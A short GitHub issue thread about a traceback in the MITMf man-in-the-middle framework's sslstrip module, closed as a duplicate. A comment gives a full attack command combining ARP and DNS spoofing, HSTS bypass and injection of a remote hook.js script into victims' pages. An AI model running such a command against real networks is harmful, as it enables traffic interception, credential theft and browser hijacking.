### ISSUE TITLE
[ProxyPlugins] hooking handleEndHeaders() Unhandled Error

### ISSUE THREAD

**Issue by BoBeR182** [byt3bl33d3r/MITMf#348]
``` bash
2016-10-14 [ProxyPlugins] hooking handleEndHeaders()
Unhandled Error
Traceback (most recent call last):
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 208, in doRead
    return self._dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 214, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/protocols/basic.py", line 571, in dataReceived
    why = self.lineReceived(line)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/web/http.py", line 468, in lineReceived
    self.handleEndHeaders()
  File "/root/MITMf/core/sslstrip/ServerConnection.py", line 182, in handleEndHeaders
    for header, value in self.client.headers.iteritems():
exceptions.AttributeError: ClientRequest instance has no attribute 'headers'
```

**Comment by BoBeR182** [comment]
```python mitmf.py --spoof --arp --dns --hsts -i wlan0 --gateway 192.168.0.1 --inject --js-url http://192.168.0.24:3000/hook.js --log-level debug```

**Comment by byt3bl33d3r** [comment]
Duplicate of #316
